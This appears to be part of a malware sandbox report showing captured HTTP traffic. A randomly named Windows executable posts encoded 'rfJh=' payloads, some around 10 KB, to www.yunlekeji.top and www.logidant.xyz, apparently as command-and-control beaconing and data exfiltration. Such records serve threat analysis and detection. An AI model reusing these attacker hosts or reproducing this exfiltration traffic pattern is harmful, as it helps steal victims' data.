                                                      Referer: http://www.yunlekeji.top/t322/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 65 48 2f 6d 2b 57 65 79 50 64 6f 37 58 5a 6f 50 43 7a 71 43 6d 78 53 30 5a 79 76 6d 67 45 70 33 46 4b 77 6b 6a 53 4b 6e 6d 74 43 34 4f 56 2b 6c 42 79 49 35 51 53 48 31 6f 7a 49 58 2b 2f 32 61 35 6b 58 61 64 54 58 36 57 66 46 67 76 50 33 78 62 76 62 72 6c 2f 4b 65 46 34 57 6d 45 78 67 2b 43 56 43 44 48 6a 61 6e 49 59 4c 46 38 61 33 31 78 75 6c 62 52 5a 71 53 70 45 45 49 2f 6d 66 43 2f 4d 75 67 55 72 57 55 66 37 49 53 52 36 74 4d 63 36 56 62 37 58 30 38 63 74 6a 64 58 61 56 42 58 37 65 31 4b 33 54 33 52 32 4e 48 6c 42 49 6d 6c 52 69 7a 32 67 3d 3d
                                                      Data Ascii: rfJh=IA33BtMMTtUPeH/m+WeyPdo7XZoPCzqCmxS0ZyvmgEp3FKwkjSKnmtC4OV+lByI5QSH1ozIX+/2a5kXadTX6WfFgvP3xbvbrl/KeF4WmExg+CVCDHjanIYLF8a31xulbRZqSpEEI/mfC/MugUrWUf7ISR6tMc6Vb7X08ctjdXaVBX7e1K3T3R2NHlBImlRiz2g==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.449839106.15.109.3380792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:14.402816057 CET649OUTPOST /t322/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.yunlekeji.top
                                                      Origin: http://www.yunlekeji.top
                                                      Referer: http://www.yunlekeji.top/t322/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 78 33 46 71 67 6b 69 54 4b 6e 68 74 43 34 64 56 2f 76 50 53 49 75 51 53 44 58 6f 32 49 58 2b 2b 57 61 35 6c 48 61 64 67 50 35 58 50 46 69 6e 76 33 33 56 50 62 72 6c 2f 4b 65 46 34 71 63 45 78 6f 2b 43 67 53 44 48 47 6d 67 4a 59 4c 45 37 61 33 31 37 4f 6b 53 52 5a 71 73 70 42 63 75 2f 6c 6e 43 2f 50 36 67 56 2b 69 58 55 37 4a 62 4a 61 73 6a 4e 37 34 2f 37 47 64 33 42 50 76 74 51 35 31 37 66 64 54 76 62 47 79 67 44 32 70 30 34 47 42 53 6f 53 66 36 74 71 30 69 66 50 4b 4f 68 37 31 42 56 74 72 65 51 53 69 76 76 49 63 3d
                                                      Data Ascii: rfJh=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgSx3FqgkiTKnhtC4dV/vPSIuQSDXo2IX++Wa5lHadgP5XPFinv33VPbrl/KeF4qcExo+CgSDHGmgJYLE7a317OkSRZqspBcu/lnC/P6gV+iXU7JbJasjN74/7Gd3BPvtQ517fdTvbGygD2p04GBSoSf6tq0ifPKOh71BVtreQSivvIc=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.449847106.15.109.3380792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:17.057569027 CET10731OUTPOST /t322/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.yunlekeji.top
                                                      Origin: http://www.yunlekeji.top
                                                      Referer: http://www.yunlekeji.top/t322/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 35 33 46 5a 59 6b 6a 77 79 6e 67 74 43 34 47 31 2f 73 50 53 49 76 51 55 72 54 6f 32 4d 74 2b 37 53 61 2f 31 62 61 62 52 50 35 65 50 46 69 34 66 33 79 62 76 61 2f 6c 37 75 61 46 2b 4b 63 45 78 6f 2b 43 6e 71 44 41 54 61 67 45 34 4c 46 38 61 33 70 78 75 6b 36 52 5a 69 38 70 42 70 54 2f 56 48 43 2b 76 71 67 58 49 2b 58 57 62 4a 5a 63 61 73 37 4e 37 30 67 37 47 42 64 42 4f 62 55 51 2b 46 37 61 6f 36 75 42 48 79 67 51 47 5a 4b 73 55 46 76 70 53 57 35 6a 64 34 4a 57 4e 69 74 30 50 46 55 4e 36 4b 52 4b 42 43 6c 31 66 7a 62 41 77 44 63 57 53 2b 6c 30 6e 55 50 45 34 73 72 52 49 4b 49 48 4b 35 56 66 52 30 63 57 4b 37 61 59 71 71 46 74 77 7a 43 49 6e 59 31 6a 36 4c 4b 75 32 6c 64 4b 50 66 51 57 68 6b 6d 36 6d 33 79 42 4f 31 6f 38 55 53 39 6f 79 54 37 35 31 38 32 7a 70 53 38 46 30 59 31 70 34 68 46 5a 6c 2b 79 6f 55 4e 6f 70 33 35 7a 58 4a 69 4d 46 7a 34 45 70 7a 50 5a 4b [TRUNCATED]
                                                      Data Ascii: rfJh=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgS53FZYkjwyngtC4G1/sPSIvQUrTo2Mt+7Sa/1babRP5ePFi4f3ybva/l7uaF+KcExo+CnqDATagE4LF8a3pxuk6RZi8pBpT/VHC+vqgXI+XWbJZcas7N70g7GBdBObUQ+F7ao6uBHygQGZKsUFvpSW5jd4JWNit0PFUN6KRKBCl1fzbAwDcWS+l0nUPE4srRIKIHK5VfR0cWK7aYqqFtwzCInY1j6LKu2ldKPfQWhkm6m3yBO1o8US9oyT75182zpS8F0Y1p4hFZl+yoUNop35zXJiMFz4EpzPZKzWIggKW7fbIG2NeHRd7jOGyqOGKuevYqlaB24KC4lHCiYsyUMd8nTe/woRxg0e+N6lTDWSprof5a3NdB+CZVGZbmofUC1ZxOWGuXXwc4Qgbk7JxWSI67ZbykXbyIJpD37mu4yZD3sVVNBVJlHAs5SnNbbf+EjYN3JLkpcstspdeh1UcBtRf2Iq7/qg5yltJlc+2ryhRapkNWb3/3aT3pR6pRwyUesyoKC7Lpp8tk6HfScaAJOU8QzDtoIY0ANLW6i0V7yGtjlx2R7bQBC16eKrnrQj81WegcHX/+RiUmxWrZcuvVFMfN0Ncu68UVEN/ekcJc5ZjtSxoQnlpSw8hu+eHNR3sN26xYVvzE8L6/ZZSyfovBvGM1BrBl/5sc1diMmwFaY6jWekqjk1Tj7/yMPeFmzusLk0ubIdbrm4cDtmjhORSmnJthJUmf1/EcwOSAzQMNKGZyHVchJ7pkpAh3PxfuwvDKCQQ5YickqtIdCMzqTmDY+sNiNuNGFORh5+0yo2p0lgfdmnahnMpgBk4eMtSQHs6gV+oNrA6PztzdwjnIqn6EMKzFYUmuwvJ6WK1mFZ8AwnUPwaH7yjPPMmqnC/EBwXx3vRbHruaMP/D5e6JZO/F0UzPKNtKFOfp62eb0LG+3xx4ITznzG5XzfeylCwsFwuhxvYI1mq [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.449854106.15.109.3380792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:19.709201097 CET364OUTGET /t322/?rfJh=FCfXCbowRdQKA3bJwmXvc8lOOpkaFxffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR69fnaXkcIGP7N+ZF5LcImJ8BAL5CR7GLvE=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.yunlekeji.top
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:55:24.370456934 CET1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:24 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Data Raw: 31 39 66 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d [TRUNCATED]
                                                      Data Ascii: 19f2<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title></title> <meta name="robots" content="noindex,nofollow" /> <style> /* Base */ body { color: #333; font: 16px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color [TRUNCATED]
                                                      Dec 3, 2024 06:55:24.370481014 CET1236INData Raw: 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20
                                                      Data Ascii: er; } a:hover{ text-decoration: underline; } .line-error{ background: #f8cbcb; } .echo table { width: 100%; } .echo pre { padding
                                                      Dec 3, 2024 06:55:24.370492935 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 39 39 39 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65
                                                      Data Ascii: border-radius: 4px; background: #999; } .exception .source-code{ padding: 6px; border: 1px solid #ddd; background: #f9f9f9; overflow-x: auto; }
                                                      Dec 3, 2024 06:55:24.370634079 CET1236INData Raw: 78 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 43 6f 75
                                                      Data Ascii: x; font-size:14px; font-family: Consolas,"Liberation Mono",Courier,Verdana,""; } .exception .trace ol{ margin: 12px; } .exception .trace ol li{ padding: 2p
                                                      Dec 3, 2024 06:55:24.370646954 CET1236INData Raw: 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 2d 76 61 72 20 74 61 62 6c 65 20 74 64 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 0a 20 20 20 20 20 20
                                                      Data Ascii: rd-break: break-all; } .exception-var table td:first-child{ width: 28%; font-weight: bold; white-space: nowrap; } .exception-var table td pre{ margin: 0; }
                                                      Dec 3, 2024 06:55:24.370659113 CET663INData Raw: 61 6c 75 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 64 65 63 2c 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 76 61 72 20 7b 20 63 6f 6c 6f 72 3a 20 23 36 30 36 20 7d 20 20 2f 2a 20 61 20 64
                                                      Data Ascii: alue */ pre.prettyprint .dec, pre.prettyprint .var { color: #606 } /* a declaration; a variable name */ pre.prettyprint .fun { color: red } /* a function name */ </style></head><body> <div class="echo">


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.44987845.141.156.11480792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:30.143064976 CET626OUTPOST /iuvu/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.logidant.xyz
                                                      Origin: http://www.logidant.xyz
                                                      Referer: http://www.logidant.xyz/iuvu/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 37 79 78 4d 4b 56 72 49 48 54 44 44 32 46 41 51 57 75 57 47 2f 63 4c 7a 78 58 6d 50 68 74 56 46 6e 67 58 31 51 54 68 4e 35 45 49 53 63 66 75 4a 45 2b 30 52 67 66 74 61 6a 43 39 68 39 4a 75 30 74 6c 34 76 73 47 4a 52 56 62 39 2f 56 53 53 2b 34 48 41 6e 35 77 6a 62 36 74 76 42 4a 6a 59 2b 75 77 4d 54 77 68 58 73 77 35 34 47 2b 47 7a 37 45 79 7a 32 69 75 4a 62 31 6a 70 42 42 64 6c 57 50 4a 65 74 71 53 36 53 73 34 68 74 5a 55 6f 39 66 69 69 33 44 33 71 57 41 62 61 55 42 49 70 51 6b 63 59 34 6c 45 38 38 32 2f 44 2f 6d 6f 31 2b 6b 6e 39 6a 77 3d 3d
                                                      Data Ascii: rfJh=1E6C75TZpJNES7yxMKVrIHTDD2FAQWuWG/cLzxXmPhtVFngX1QThN5EIScfuJE+0RgftajC9h9Ju0tl4vsGJRVb9/VSS+4HAn5wjb6tvBJjY+uwMTwhXsw54G+Gz7Eyz2iuJb1jpBBdlWPJetqS6Ss4htZUo9fii3D3qWAbaUBIpQkcY4lE882/D/mo1+kn9jw==
                                                      Dec 3, 2024 06:55:31.485246897 CET691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:31 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.44988545.141.156.11480792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:32.805386066 CET646OUTPOST /iuvu/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.logidant.xyz
                                                      Origin: http://www.logidant.xyz
                                                      Referer: http://www.logidant.xyz/iuvu/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 54 35 56 47 46 6f 58 30 53 72 68 41 5a 45 49 4b 4d 66 72 55 55 2b 39 52 67 54 66 61 6d 36 39 68 38 74 75 30 6f 68 34 76 62 79 4b 58 46 62 2f 33 31 53 55 77 59 48 41 6e 35 77 6a 62 36 34 41 42 4a 37 59 2b 2b 41 4d 53 54 35 59 6b 51 35 35 42 2b 47 7a 2f 45 79 33 32 69 75 52 62 33 62 54 42 48 5a 6c 57 4f 35 65 74 34 71 35 62 73 34 76 77 70 56 64 37 61 50 31 75 7a 2f 71 58 67 7a 75 63 43 63 4b 59 43 52 43 70 55 6c 72 75 32 62 77 69 68 68 42 7a 6e 61 30 34 35 61 2b 48 53 6b 77 48 73 5a 75 4b 74 2b 53 59 78 2b 50 6b 37 30 3d
                                                      Data Ascii: rfJh=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OT5VGFoX0SrhAZEIKMfrUU+9RgTfam69h8tu0oh4vbyKXFb/31SUwYHAn5wjb64ABJ7Y++AMST5YkQ55B+Gz/Ey32iuRb3bTBHZlWO5et4q5bs4vwpVd7aP1uz/qXgzucCcKYCRCpUlru2bwihhBzna045a+HSkwHsZuKt+SYx+Pk70=
                                                      Dec 3, 2024 06:55:34.106460094 CET691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.44989245.141.156.11480792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:35.462796926 CET10728OUTPOST /iuvu/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.logidant.xyz
                                                      Origin: http://www.logidant.xyz
                                                      Referer: http://www.logidant.xyz/iuvu/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 53 42 56 47 32 77 58 30 7a 72 68 42 5a 45 49 55 63 66 71 55 55 2f 2f 52 67 4c 62 61 6d 6d 44 68 2b 6c 75 79 4b 70 34 6e 4b 79 4b 65 46 62 2f 6f 6c 53 52 2b 34 48 5a 6e 39 63 6e 62 36 6f 41 42 4a 37 59 2b 34 6b 4d 47 77 68 59 69 51 35 34 47 2b 48 79 37 45 79 66 32 69 32 42 62 78 48 44 42 58 35 6c 58 74 42 65 76 4c 53 35 48 38 35 4a 67 35 56 46 37 61 4b 79 75 7a 69 52 58 67 32 37 63 44 6b 4b 59 48 77 42 35 48 70 7a 78 48 4c 7a 39 44 35 52 38 56 69 68 38 4a 71 51 4e 6a 39 6c 51 59 42 2b 48 64 76 34 50 41 69 38 6e 65 4f 7a 47 4e 6f 46 5a 69 36 49 55 30 35 62 30 43 39 48 54 56 66 4d 72 75 4b 2b 46 38 4a 65 46 7a 39 53 37 6b 53 66 37 58 6b 51 6a 50 2f 6e 6f 4c 79 2f 67 47 71 52 49 61 62 61 77 47 50 68 57 41 64 2f 64 34 76 4f 72 32 4a 42 74 49 32 65 5a 6a 49 54 6d 4e 54 2b 32 58 4c 4f 76 72 79 78 6a 38 69 6e 4c 56 7a 57 38 66 74 65 31 38 36 34 41 62 77 50 6e 35 6f 6f 30 [TRUNCATED]
                                                      Data Ascii: rfJh=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OSBVG2wX0zrhBZEIUcfqUU//RgLbammDh+luyKp4nKyKeFb/olSR+4HZn9cnb6oABJ7Y+4kMGwhYiQ54G+Hy7Eyf2i2BbxHDBX5lXtBevLS5H85Jg5VF7aKyuziRXg27cDkKYHwB5HpzxHLz9D5R8Vih8JqQNj9lQYB+Hdv4PAi8neOzGNoFZi6IU05b0C9HTVfMruK+F8JeFz9S7kSf7XkQjP/noLy/gGqRIabawGPhWAd/d4vOr2JBtI2eZjITmNT+2XLOvryxj8inLVzW8fte1864AbwPn5oo0CKwcVAG2p+YgnaI2s/TuMH4v/PNJuqyziIUOJ2ONATxN7UIIu7gCwUfyjg71WgGXQO9Ufz1GfxrxuVFUYDpwCaR9CwK5FH6wYOBEW7Wn7do4kc6M6E1z+8fov02aAWhn08/DQfZToEV5nP6gSWVLGOUkB4O7nqLiWZu3N8dIrEGrlVdv5PcDvbxUUYWVVV0k9EQjtx0NXPZ6wjFwawc4zO2vmQ3dkmBuDIFnqWv+DzaYY5slB+5G7Ygj1DVfAL1h7s8WPx7Vf60Wvd2epYKssLo3Rf+ixL9qiYMCLSx/ttTjNuipqAHyq/gqbbeIQh0DcDI4EfXP5AzRzKiTdZCXaBkc/o0k0YvXIvzlwJbqyk//t0FZhbDW9ex/4DFvXSENnwxTUgtiTRuRAIzH9hiid+fxV+fTfdNYzFq7Ivl4whO7D5fdF6NzFuENsBQQ/9CqhcO6jfO6+XgJf9wIcUKIXCOFxse8xPUYTicgLEuspiREtC3VOdmmmbroUY/fIfOrIT4cE+zFpzffo4Ci7Hgq3tCMtC2M7VRql74fvJUj/hTGqLp7p5mhdLw28pbty2mQmoEVSgIzvp5cPwn3blEKn766SA64Jm+cU1F4mrXAMSAkmLsLrRP92yfBFrrUZOmsXjMh1K7lQyrLfk+m1nmLCwOvO3hLWJFNDS [TRUNCATED]
                                                      Dec 3, 2024 06:55:36.784461021 CET691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:36 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 